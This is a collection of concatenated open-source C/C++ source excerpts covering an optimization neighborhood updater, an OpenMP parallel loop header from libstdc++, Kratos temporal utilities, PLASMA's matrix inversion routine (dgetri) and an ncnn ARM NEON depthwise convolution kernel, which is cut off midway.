(-binomials[i].constant_value -
binomials[i].sensitivity_second *
(binomials[i].variable_ptr_second->value() +
1)) /
binomials[i].sensitivity_first;
if ((binomials[i].sensitivity_first > 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Less) ||
(binomials[i].sensitivity_first < 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Greater)) {
target = static_cast<T_Variable>(
std::floor(target_temp));
} else {
target =
static_cast<T_Variable>(std::ceil(target_temp));
}
alterations[0].second = target;
alterations[1].second =
binomials[i].variable_ptr_second->value() + 1;
}
{
auto index = 4 * i + 3;
auto &alterations = (*a_moves_ptr)[index].alterations;
T_Variable target = 0;
double target_temp =
(-binomials[i].constant_value -
binomials[i].sensitivity_second *
(binomials[i].variable_ptr_second->value() -
1)) /
binomials[i].sensitivity_first;
if ((binomials[i].sensitivity_first > 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Less) ||
(binomials[i].sensitivity_first < 0 &&
binomials[i].sense ==
model_component::ConstraintSense::Greater)) {
target = static_cast<T_Variable>(
std::floor(target_temp));
} else {
target =
static_cast<T_Variable>(std::ceil(target_temp));
}
alterations[0].second = target;
alterations[1].second =
binomials[i].variable_ptr_second->value() - 1;
}
}
const int MOVES_SIZE = a_moves_ptr->size();
#ifdef _OPENMP
#pragma omp parallel for if (a_IS_ENABLED_PARALLEL) schedule(static)
#endif
for (auto i = 0; i < MOVES_SIZE; i++) {
(*a_flags)[i] = 1;
if (!(*a_moves_ptr)[i].is_available) {
(*a_flags)[i] = 0;
continue;
}
if (neighborhood::has_fixed_variable((*a_moves_ptr)[i])) {
(*a_flags)[i] = 0;
continue;
}
if (neighborhood::has_bound_violation((*a_moves_ptr)[i])) {
(*a_flags)[i] = 0;
continue;
}
if (a_ACCEPT_ALL) {
/** nothing to do */
} else {
if (a_ACCEPT_OBJECTIVE_IMPROVABLE &&
neighborhood::has_objective_improvable_variable(
(*a_moves_ptr)[i])) {
continue;
}
if (a_ACCEPT_FEASIBILITY_IMPROVABLE &&
neighborhood::has_feasibility_improvable_variable(
(*a_moves_ptr)[i])) {
continue;
}
(*a_flags)[i] = 0;
}
}
};
this->m_move_updater = move_updater;
}
};
} // namespace neighborhood
} // namespace printemps
#endif
/*****************************************************************************/
// END
/*****************************************************************************/ |
omp_loop_static.h | // -*- C++ -*-
// Copyright (C) 2007, 2008, 2009, 2010 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the terms
// of the GNU General Public License as published by the Free Software
// Foundation; either version 3, or (at your option) any later
// version.
// This library is distributed in the hope that it will be useful, but
// WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// General Public License for more details.
// Under Section 7 of GPL version 3, you are granted additional
// permissions described in the GCC Runtime Library Exception, version
// 3.1, as published by the Free Software Foundation.
// You should have received a copy of the GNU General Public License and
// a copy of the GCC Runtime Library Exception along with this program;
// see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
// <http://www.gnu.org/licenses/>.
/** @file parallel/omp_loop_static.h
* @brief Parallelization of embarrassingly parallel execution by
* means of an OpenMP for loop with static scheduling.
* This file is a GNU parallel extension to the Standard C++ Library.
*/
// Written by Felix Putze.
#ifndef _GLIBCXX_PARALLEL_OMP_LOOP_STATIC_H
#define _GLIBCXX_PARALLEL_OMP_LOOP_STATIC_H 1
#include <omp.h>
#include <parallel/settings.h>
#include <parallel/basic_iterator.h>
namespace __gnu_parallel
{
/** @brief Embarrassingly parallel algorithm for random access
* iterators, using an OpenMP for loop with static scheduling.
*
* @param __begin Begin iterator of element sequence.
* @param __end End iterator of element sequence.
* @param __o User-supplied functor (comparator, predicate, adding
* functor, ...).
* @param __f Functor to @a process an element with __o (depends on
* desired functionality, e. g. for std::for_each(), ...).
* @param __r Functor to @a add a single __result to the already processed
* __elements (depends on functionality).
* @param __base Base value for reduction.
* @param __output Pointer to position where final result is written to
* @param __bound Maximum number of elements processed (e. g. for
* std::count_n()).
* @return User-supplied functor (that may contain a part of the result).
*/
template<typename _RAIter,
typename _Op,
typename _Fu,
typename _Red,
typename _Result>
_Op
__for_each_template_random_access_omp_loop_static(_RAIter __begin,
_RAIter __end, _Op __o,
_Fu& __f, _Red __r,
_Result __base,
_Result& __output,
typename std::iterator_traits<_RAIter>::difference_type __bound)
{
typedef typename std::iterator_traits<_RAIter>::difference_type
_DifferenceType;
_DifferenceType __length = __end - __begin;
_ThreadIndex __num_threads = std::min<_DifferenceType>
(__get_max_threads(), __length);
_Result *__thread_results;
# pragma omp parallel num_threads(__num_threads)
{
# pragma omp single
{
__num_threads = omp_get_num_threads();
__thread_results = new _Result[__num_threads];
for (_ThreadIndex __i = 0; __i < __num_threads; ++__i)
__thread_results[__i] = _Result();
}
_ThreadIndex __iam = omp_get_thread_num();
#pragma omp for schedule(static, _Settings::get().workstealing_chunk_size)
for (_DifferenceType __pos = 0; __pos < __length; ++__pos)
__thread_results[__iam] = __r(__thread_results[__iam],
__f(__o, __begin+__pos));
} //parallel
for (_ThreadIndex __i = 0; __i < __num_threads; ++__i)
__output = __r(__output, __thread_results[__i]);
delete [] __thread_results;
// Points to last element processed (needed as return value for
// some algorithms like transform).
__f.finish_iterator = __begin + __length;
return __o;
}
} // end namespace
#endif /* _GLIBCXX_PARALLEL_OMP_LOOP_STATIC_H */
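// A distilled, self-contained sketch (names are mine, not part of the
// library) of the pattern implemented above: per-thread partial results
// filled under an OpenMP for loop with static scheduling, followed by a
// sequential final reduction.
#ifdef _GLIBCXX_PARALLEL_OMP_LOOP_STATIC_DEMO
#include <omp.h>
double
__omp_loop_static_sum_demo(const double* __data, long __len)
{
int __num_threads = 1;
double* __results = 0;
#pragma omp parallel
{
#pragma omp single
{
__num_threads = omp_get_num_threads();
__results = new double[__num_threads]();
}
int __iam = omp_get_thread_num();
#pragma omp for schedule(static)
for (long __pos = 0; __pos < __len; ++__pos)
__results[__iam] += __data[__pos];
} // implicit barrier: all partial results are ready
double __sum = 0.0;
for (int __i = 0; __i < __num_threads; ++__i)
__sum += __results[__i];
delete[] __results;
return __sum;
}
#endif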
|
temporal_method_utilities.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Suneth Warnakulasuriya (https://github.com/sunethwarna)
//
#if !defined(KRATOS_TEMPORAL_METHOD_UTILITIES_H_INCLUDED)
#define KRATOS_TEMPORAL_METHOD_UTILITIES_H_INCLUDED
// System includes
// External includes
// Project includes
// Application includes
#include "custom_utilities/method_utilities.h"
namespace Kratos
{
///@addtogroup RANSApplication
///@{
///@name Kratos Globals
///@{
namespace TemporalMethodUtilities
{
template <class TContainerType, class TContainerItemType, template <class T> class TDataRetrievalFunctor, template <class T> class TDataStorageFunctor, class TDataType>
void InitializeVariables(
TContainerType& rContainer,
const Variable<TDataType>& rOutputVariable,
const Variable<TDataType>& rReferenceVariable)
{
if (rContainer.size() > 0)
{
const int number_of_items = rContainer.size();
#pragma omp parallel for
for (int i = 0; i < number_of_items; ++i)
{
TContainerItemType& r_item = *(rContainer.begin() + i);
const TDataType& r_reference_value =
TDataRetrievalFunctor<TContainerItemType>()(r_item, rReferenceVariable);
TDataType output_value = rOutputVariable.Zero();
MethodUtilities::DataTypeSizeInitializer<TDataType>(output_value, r_reference_value);
TDataStorageFunctor<TContainerItemType>()(r_item, rOutputVariable, output_value);
}
}
}
template <class TContainerType, class TContainerItemType, template <class T> class TDataStorageFunctor>
void InitializeVariables(TContainerType& rContainer, const Variable<double>& rOutputVariable, const double InitializerValue)
{
if (rContainer.size() > 0)
{
const int number_of_items = rContainer.size();
#pragma omp parallel for
for (int i = 0; i < number_of_items; ++i)
{
TContainerItemType& r_item = *(rContainer.begin() + i);
TDataStorageFunctor<TContainerItemType>()(r_item, rOutputVariable, InitializerValue);
}
}
}
} // namespace TemporalMethodUtilities
} // namespace Kratos
#endif // KRATOS_TEMPORAL_METHOD_UTILITIES_H_INCLUDED |
dgetri.c | /**
*
* @file
*
* PLASMA is a software package provided by:
* University of Tennessee, US,
* University of Manchester, UK.
*
* @generated from /home/luszczek/workspace/plasma/bitbucket/plasma/compute/zgetri.c, normal z -> d, Fri Sep 28 17:38:06 2018
*
**/
#include "plasma.h"
#include "plasma_async.h"
#include "plasma_context.h"
#include "plasma_descriptor.h"
#include "plasma_internal.h"
#include "plasma_tuning.h"
#include "plasma_types.h"
#include "plasma_workspace.h"
/***************************************************************************//**
*
* @ingroup plasma_getri
*
* Computes the inverse of a matrix A using the LU factorization computed
* by plasma_dgetrf.
*
*******************************************************************************
*
* @param[in] n
* The order of the matrix A. n >= 0.
*
* @param[in,out] pA
* On entry, the LU factors computed by plasma_dgetrf.
* On exit, the inverse of A, overwriting the factors.
*
* @param[in] lda
* The leading dimension of the array A. lda >= max(1,n).
*
* @param[in] ipiv
* The pivot indices computed by plasma_dgetrf.
*
*******************************************************************************
*
* @retval PLASMA_SUCCESS successful exit
* @retval < 0 if -i, the i-th argument had an illegal value
* @retval > 0 if i, the (i,i) element of the factor U or L is
* zero, and the inverse could not be computed.
*
*******************************************************************************
*
* @sa plasma_cgetri
* @sa plasma_sgetri
*
******************************************************************************/
int plasma_dgetri(int n, double *pA, int lda, int *ipiv)
{
// Get PLASMA context.
plasma_context_t *plasma = plasma_context_self();
if (plasma == NULL) {
plasma_fatal_error("PLASMA not initialized");
return PlasmaErrorNotInitialized;
}
// Check input arguments.
if (n < 0) {
plasma_error("illegal value of n");
return -1;
}
if (lda < imax(1, n)) {
plasma_error("illegal value of lda");
return -3;
}
// quick return
if (imax(n, 0) == 0)
return PlasmaSuccess;
// Tune parameters.
if (plasma->tuning)
plasma_tune_getrf(plasma, PlasmaRealDouble, n, n);
// Set tiling parameters.
int nb = plasma->nb;
// Create tile matrix.
plasma_desc_t A;
plasma_desc_t W;
int retval;
retval = plasma_desc_general_create(PlasmaRealDouble, nb, nb,
n, n, 0, 0, n, n, &A);
if (retval != PlasmaSuccess) {
plasma_error("plasma_desc_general_create() failed");
return retval;
}
retval = plasma_desc_general_create(PlasmaRealDouble, nb, nb,
n, nb, 0, 0, n, nb, &W);
if (retval != PlasmaSuccess) {
plasma_error("plasma_desc_general_create() failed");
plasma_desc_destroy(&A);
return retval;
}
// Initialize sequence.
plasma_sequence_t sequence;
retval = plasma_sequence_init(&sequence);
// Initialize request.
plasma_request_t request;
retval = plasma_request_init(&request);
// asynchronous block
#pragma omp parallel
#pragma omp master
{
// Translate to tile layout.
plasma_omp_dge2desc(pA, lda, A, &sequence, &request);
// Perform computation.
plasma_omp_dgetri(A, ipiv, W, &sequence, &request);
// Translate back to LAPACK layout.
plasma_omp_ddesc2ge(A, pA, lda, &sequence, &request);
}
// implicit synchronization
// Free matrices in tile layout.
plasma_desc_destroy(&W);
plasma_desc_destroy(&A);
// Return status.
int status = sequence.status;
return status;
}
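/*
 * Usage sketch (illustrative only; it assumes the standard PLASMA driver
 * entry points plasma_init(), plasma_dgetrf() and plasma_finalize() from
 * plasma.h -- check the installed headers for the exact signatures):
 *
 *     plasma_init();
 *     int *ipiv = (int*) malloc((size_t) n * sizeof(int));
 *     int info = plasma_dgetrf(n, n, A, lda, ipiv);  // LU factorization of A
 *     if (info == PlasmaSuccess)
 *         info = plasma_dgetri(n, A, lda, ipiv);     // A now holds inv(A)
 *     free(ipiv);
 *     plasma_finalize();
 */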
/***************************************************************************//**
*
* Computes the inverse of a matrix A using the LU factorization.
 * Non-blocking tile version of plasma_dgetri().
* Operates on matrices stored by tiles.
* All matrices are passed through descriptors.
* All dimensions are taken from the descriptors.
* Allows for pipelining of operations at runtime.
*
*******************************************************************************
*
* @param[in] A
* On entry, the LU factors computed by plasma_dgetrf.
* On exit, the inverse of A, overwriting the factors.
*
* @param[in] ipiv
* The pivot indices computed by plasma_dgetrf.
*
* @param[out] W
* Workspace of dimension (n, nb)
*
* @param[in] sequence
* Identifies the sequence of function calls that this call belongs to
* (for completion checks and exception handling purposes). Check
* the sequence->status for errors.
*
* @param[out] request
* Identifies this function call (for exception handling purposes).
*
* @retval void
* Errors are returned by setting sequence->status and
* request->status to error values. The sequence->status and
* request->status should never be set to PlasmaSuccess (the
* initial values) since another async call may be setting a
* failure value at the same time.
*
*******************************************************************************
*
* @sa plasma_dgetri
* @sa plasma_omp_dgetri
* @sa plasma_omp_cgetri
* @sa plasma_omp_sgetri
*
******************************************************************************/
void plasma_omp_dgetri(plasma_desc_t A, int *ipiv, plasma_desc_t W,
plasma_sequence_t *sequence, plasma_request_t *request)
{
// Get PLASMA context.
plasma_context_t *plasma = plasma_context_self();
if (plasma == NULL) {
plasma_error("PLASMA not initialized");
plasma_request_fail(sequence, request, PlasmaErrorNotInitialized);
return;
}
// Check input arguments.
if (plasma_desc_check(A) != PlasmaSuccess) {
plasma_error("invalid A");
plasma_request_fail(sequence, request, PlasmaErrorIllegalValue);
return;
}
if (plasma_desc_check(W) != PlasmaSuccess) {
plasma_error("invalid W");
plasma_request_fail(sequence, request, PlasmaErrorIllegalValue);
return;
}
if (sequence == NULL) {
plasma_error("NULL sequence");
plasma_request_fail(sequence, request, PlasmaErrorIllegalValue);
return;
}
if (request == NULL) {
plasma_error("NULL request");
plasma_request_fail(sequence, request, PlasmaErrorIllegalValue);
return;
}
// quick return
if (A.n == 0)
return;
// Invert triangular part.
plasma_pdtrtri(PlasmaUpper, PlasmaNonUnit, A, sequence, request);
// Compute product of inverse of the upper and lower triangles.
plasma_pdgetri_aux(A, W, sequence, request);
// Apply pivot.
plasma_pdgeswp(PlasmaColumnwise, A, ipiv, -1, sequence, request);
}
|
convolutiondepthwise_5x5_pack4.h | // Tencent is pleased to support the open source community by making ncnn available.
//
// Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
static void convdw5x5s1_pack4_neon(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel, const Mat& _bias, const Option& opt)
{
int w = bottom_blob.w;
int outw = top_blob.w;
int outh = top_blob.h;
const int group = bottom_blob.c;
const float* bias = _bias;
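// Depthwise convolution: each group (one packed-4 channel) is independent
// of the others, so the group loop is parallelized across opt.num_threads.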
#pragma omp parallel for num_threads(opt.num_threads)
for (int g=0; g<group; g++)
{
Mat out = top_blob.channel(g);
float32x4_t _bias0 = bias ? vld1q_f32((const float*)bias + g * 4) : vdupq_n_f32(0.f);
const float* k0 = kernel.row(g);
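// Per-group kernel: 5x5 taps x 4 packed lanes = 100 floats. k0 advances
// 20 floats per kernel row and rewinds 80 after the fifth row, so the
// same weights are reused at the next output position.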
float* outptr0 = out.row(0);
float* outptr1 = out.row(1);
const Mat img0 = bottom_blob.channel(g);
const float* r0 = img0.row(0);
const float* r1 = img0.row(1);
const float* r2 = img0.row(2);
const float* r3 = img0.row(3);
const float* r4 = img0.row(4);
const float* r5 = img0.row(5);
int i = 0;
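// On AArch64 (32 NEON registers) compute two output rows by four output
// columns per iteration; the generic row loop after the #endif handles
// any remaining rows and is the only path on 32-bit ARM.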
#if __aarch64__
for (; i+1 < outh; i+=2)
{
int j = 0;
for (; j+3 < outw; j+=4)
{
float32x4_t _sum00 = _bias0;
float32x4_t _sum01 = _bias0;
float32x4_t _sum02 = _bias0;
float32x4_t _sum03 = _bias0;
float32x4_t _sum10 = _bias0;
float32x4_t _sum11 = _bias0;
float32x4_t _sum12 = _bias0;
float32x4_t _sum13 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _r06 = vld1q_f32(r0+24);
float32x4_t _r07 = vld1q_f32(r0+28);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum00 = vmlaq_f32(_sum00, _k00, _r00);
_sum00 = vmlaq_f32(_sum00, _k01, _r01);
_sum00 = vmlaq_f32(_sum00, _k02, _r02);
_sum00 = vmlaq_f32(_sum00, _k03, _r03);
_sum00 = vmlaq_f32(_sum00, _k04, _r04);
_sum01 = vmlaq_f32(_sum01, _k00, _r01);
_sum01 = vmlaq_f32(_sum01, _k01, _r02);
_sum01 = vmlaq_f32(_sum01, _k02, _r03);
_sum01 = vmlaq_f32(_sum01, _k03, _r04);
_sum01 = vmlaq_f32(_sum01, _k04, _r05);
_sum02 = vmlaq_f32(_sum02, _k00, _r02);
_sum02 = vmlaq_f32(_sum02, _k01, _r03);
_sum02 = vmlaq_f32(_sum02, _k02, _r04);
_sum02 = vmlaq_f32(_sum02, _k03, _r05);
_sum02 = vmlaq_f32(_sum02, _k04, _r06);
_sum03 = vmlaq_f32(_sum03, _k00, _r03);
_sum03 = vmlaq_f32(_sum03, _k01, _r04);
_sum03 = vmlaq_f32(_sum03, _k02, _r05);
_sum03 = vmlaq_f32(_sum03, _k03, _r06);
_sum03 = vmlaq_f32(_sum03, _k04, _r07);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _r16 = vld1q_f32(r1+24);
float32x4_t _r17 = vld1q_f32(r1+28);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k00, _r10);
_sum10 = vmlaq_f32(_sum10, _k01, _r11);
_sum10 = vmlaq_f32(_sum10, _k02, _r12);
_sum10 = vmlaq_f32(_sum10, _k03, _r13);
_sum10 = vmlaq_f32(_sum10, _k04, _r14);
_sum11 = vmlaq_f32(_sum11, _k00, _r11);
_sum11 = vmlaq_f32(_sum11, _k01, _r12);
_sum11 = vmlaq_f32(_sum11, _k02, _r13);
_sum11 = vmlaq_f32(_sum11, _k03, _r14);
_sum11 = vmlaq_f32(_sum11, _k04, _r15);
_sum12 = vmlaq_f32(_sum12, _k00, _r12);
_sum12 = vmlaq_f32(_sum12, _k01, _r13);
_sum12 = vmlaq_f32(_sum12, _k02, _r14);
_sum12 = vmlaq_f32(_sum12, _k03, _r15);
_sum12 = vmlaq_f32(_sum12, _k04, _r16);
_sum13 = vmlaq_f32(_sum13, _k00, _r13);
_sum13 = vmlaq_f32(_sum13, _k01, _r14);
_sum13 = vmlaq_f32(_sum13, _k02, _r15);
_sum13 = vmlaq_f32(_sum13, _k03, _r16);
_sum13 = vmlaq_f32(_sum13, _k04, _r17);
_sum00 = vmlaq_f32(_sum00, _k10, _r10);
_sum00 = vmlaq_f32(_sum00, _k11, _r11);
_sum00 = vmlaq_f32(_sum00, _k12, _r12);
_sum00 = vmlaq_f32(_sum00, _k13, _r13);
_sum00 = vmlaq_f32(_sum00, _k14, _r14);
_sum01 = vmlaq_f32(_sum01, _k10, _r11);
_sum01 = vmlaq_f32(_sum01, _k11, _r12);
_sum01 = vmlaq_f32(_sum01, _k12, _r13);
_sum01 = vmlaq_f32(_sum01, _k13, _r14);
_sum01 = vmlaq_f32(_sum01, _k14, _r15);
_sum02 = vmlaq_f32(_sum02, _k10, _r12);
_sum02 = vmlaq_f32(_sum02, _k11, _r13);
_sum02 = vmlaq_f32(_sum02, _k12, _r14);
_sum02 = vmlaq_f32(_sum02, _k13, _r15);
_sum02 = vmlaq_f32(_sum02, _k14, _r16);
_sum03 = vmlaq_f32(_sum03, _k10, _r13);
_sum03 = vmlaq_f32(_sum03, _k11, _r14);
_sum03 = vmlaq_f32(_sum03, _k12, _r15);
_sum03 = vmlaq_f32(_sum03, _k13, _r16);
_sum03 = vmlaq_f32(_sum03, _k14, _r17);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _r26 = vld1q_f32(r2+24);
float32x4_t _r27 = vld1q_f32(r2+28);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k10, _r20);
_sum10 = vmlaq_f32(_sum10, _k11, _r21);
_sum10 = vmlaq_f32(_sum10, _k12, _r22);
_sum10 = vmlaq_f32(_sum10, _k13, _r23);
_sum10 = vmlaq_f32(_sum10, _k14, _r24);
_sum11 = vmlaq_f32(_sum11, _k10, _r21);
_sum11 = vmlaq_f32(_sum11, _k11, _r22);
_sum11 = vmlaq_f32(_sum11, _k12, _r23);
_sum11 = vmlaq_f32(_sum11, _k13, _r24);
_sum11 = vmlaq_f32(_sum11, _k14, _r25);
_sum12 = vmlaq_f32(_sum12, _k10, _r22);
_sum12 = vmlaq_f32(_sum12, _k11, _r23);
_sum12 = vmlaq_f32(_sum12, _k12, _r24);
_sum12 = vmlaq_f32(_sum12, _k13, _r25);
_sum12 = vmlaq_f32(_sum12, _k14, _r26);
_sum13 = vmlaq_f32(_sum13, _k10, _r23);
_sum13 = vmlaq_f32(_sum13, _k11, _r24);
_sum13 = vmlaq_f32(_sum13, _k12, _r25);
_sum13 = vmlaq_f32(_sum13, _k13, _r26);
_sum13 = vmlaq_f32(_sum13, _k14, _r27);
_sum00 = vmlaq_f32(_sum00, _k20, _r20);
_sum00 = vmlaq_f32(_sum00, _k21, _r21);
_sum00 = vmlaq_f32(_sum00, _k22, _r22);
_sum00 = vmlaq_f32(_sum00, _k23, _r23);
_sum00 = vmlaq_f32(_sum00, _k24, _r24);
_sum01 = vmlaq_f32(_sum01, _k20, _r21);
_sum01 = vmlaq_f32(_sum01, _k21, _r22);
_sum01 = vmlaq_f32(_sum01, _k22, _r23);
_sum01 = vmlaq_f32(_sum01, _k23, _r24);
_sum01 = vmlaq_f32(_sum01, _k24, _r25);
_sum02 = vmlaq_f32(_sum02, _k20, _r22);
_sum02 = vmlaq_f32(_sum02, _k21, _r23);
_sum02 = vmlaq_f32(_sum02, _k22, _r24);
_sum02 = vmlaq_f32(_sum02, _k23, _r25);
_sum02 = vmlaq_f32(_sum02, _k24, _r26);
_sum03 = vmlaq_f32(_sum03, _k20, _r23);
_sum03 = vmlaq_f32(_sum03, _k21, _r24);
_sum03 = vmlaq_f32(_sum03, _k22, _r25);
_sum03 = vmlaq_f32(_sum03, _k23, _r26);
_sum03 = vmlaq_f32(_sum03, _k24, _r27);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _r36 = vld1q_f32(r3+24);
float32x4_t _r37 = vld1q_f32(r3+28);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum10 = vmlaq_f32(_sum10, _k20, _r30);
_sum10 = vmlaq_f32(_sum10, _k21, _r31);
_sum10 = vmlaq_f32(_sum10, _k22, _r32);
_sum10 = vmlaq_f32(_sum10, _k23, _r33);
_sum10 = vmlaq_f32(_sum10, _k24, _r34);
_sum11 = vmlaq_f32(_sum11, _k20, _r31);
_sum11 = vmlaq_f32(_sum11, _k21, _r32);
_sum11 = vmlaq_f32(_sum11, _k22, _r33);
_sum11 = vmlaq_f32(_sum11, _k23, _r34);
_sum11 = vmlaq_f32(_sum11, _k24, _r35);
_sum12 = vmlaq_f32(_sum12, _k20, _r32);
_sum12 = vmlaq_f32(_sum12, _k21, _r33);
_sum12 = vmlaq_f32(_sum12, _k22, _r34);
_sum12 = vmlaq_f32(_sum12, _k23, _r35);
_sum12 = vmlaq_f32(_sum12, _k24, _r36);
_sum13 = vmlaq_f32(_sum13, _k20, _r33);
_sum13 = vmlaq_f32(_sum13, _k21, _r34);
_sum13 = vmlaq_f32(_sum13, _k22, _r35);
_sum13 = vmlaq_f32(_sum13, _k23, _r36);
_sum13 = vmlaq_f32(_sum13, _k24, _r37);
_sum00 = vmlaq_f32(_sum00, _k30, _r30);
_sum00 = vmlaq_f32(_sum00, _k31, _r31);
_sum00 = vmlaq_f32(_sum00, _k32, _r32);
_sum00 = vmlaq_f32(_sum00, _k33, _r33);
_sum00 = vmlaq_f32(_sum00, _k34, _r34);
_sum01 = vmlaq_f32(_sum01, _k30, _r31);
_sum01 = vmlaq_f32(_sum01, _k31, _r32);
_sum01 = vmlaq_f32(_sum01, _k32, _r33);
_sum01 = vmlaq_f32(_sum01, _k33, _r34);
_sum01 = vmlaq_f32(_sum01, _k34, _r35);
_sum02 = vmlaq_f32(_sum02, _k30, _r32);
_sum02 = vmlaq_f32(_sum02, _k31, _r33);
_sum02 = vmlaq_f32(_sum02, _k32, _r34);
_sum02 = vmlaq_f32(_sum02, _k33, _r35);
_sum02 = vmlaq_f32(_sum02, _k34, _r36);
_sum03 = vmlaq_f32(_sum03, _k30, _r33);
_sum03 = vmlaq_f32(_sum03, _k31, _r34);
_sum03 = vmlaq_f32(_sum03, _k32, _r35);
_sum03 = vmlaq_f32(_sum03, _k33, _r36);
_sum03 = vmlaq_f32(_sum03, _k34, _r37);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _r46 = vld1q_f32(r4+24);
float32x4_t _r47 = vld1q_f32(r4+28);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum10 = vmlaq_f32(_sum10, _k30, _r40);
_sum10 = vmlaq_f32(_sum10, _k31, _r41);
_sum10 = vmlaq_f32(_sum10, _k32, _r42);
_sum10 = vmlaq_f32(_sum10, _k33, _r43);
_sum10 = vmlaq_f32(_sum10, _k34, _r44);
_sum11 = vmlaq_f32(_sum11, _k30, _r41);
_sum11 = vmlaq_f32(_sum11, _k31, _r42);
_sum11 = vmlaq_f32(_sum11, _k32, _r43);
_sum11 = vmlaq_f32(_sum11, _k33, _r44);
_sum11 = vmlaq_f32(_sum11, _k34, _r45);
_sum12 = vmlaq_f32(_sum12, _k30, _r42);
_sum12 = vmlaq_f32(_sum12, _k31, _r43);
_sum12 = vmlaq_f32(_sum12, _k32, _r44);
_sum12 = vmlaq_f32(_sum12, _k33, _r45);
_sum12 = vmlaq_f32(_sum12, _k34, _r46);
_sum13 = vmlaq_f32(_sum13, _k30, _r43);
_sum13 = vmlaq_f32(_sum13, _k31, _r44);
_sum13 = vmlaq_f32(_sum13, _k32, _r45);
_sum13 = vmlaq_f32(_sum13, _k33, _r46);
_sum13 = vmlaq_f32(_sum13, _k34, _r47);
_sum00 = vmlaq_f32(_sum00, _k40, _r40);
_sum00 = vmlaq_f32(_sum00, _k41, _r41);
_sum00 = vmlaq_f32(_sum00, _k42, _r42);
_sum00 = vmlaq_f32(_sum00, _k43, _r43);
_sum00 = vmlaq_f32(_sum00, _k44, _r44);
_sum01 = vmlaq_f32(_sum01, _k40, _r41);
_sum01 = vmlaq_f32(_sum01, _k41, _r42);
_sum01 = vmlaq_f32(_sum01, _k42, _r43);
_sum01 = vmlaq_f32(_sum01, _k43, _r44);
_sum01 = vmlaq_f32(_sum01, _k44, _r45);
_sum02 = vmlaq_f32(_sum02, _k40, _r42);
_sum02 = vmlaq_f32(_sum02, _k41, _r43);
_sum02 = vmlaq_f32(_sum02, _k42, _r44);
_sum02 = vmlaq_f32(_sum02, _k43, _r45);
_sum02 = vmlaq_f32(_sum02, _k44, _r46);
_sum03 = vmlaq_f32(_sum03, _k40, _r43);
_sum03 = vmlaq_f32(_sum03, _k41, _r44);
_sum03 = vmlaq_f32(_sum03, _k42, _r45);
_sum03 = vmlaq_f32(_sum03, _k43, _r46);
_sum03 = vmlaq_f32(_sum03, _k44, _r47);
float32x4_t _r50 = vld1q_f32(r5);
float32x4_t _r51 = vld1q_f32(r5+4);
float32x4_t _r52 = vld1q_f32(r5+8);
float32x4_t _r53 = vld1q_f32(r5+12);
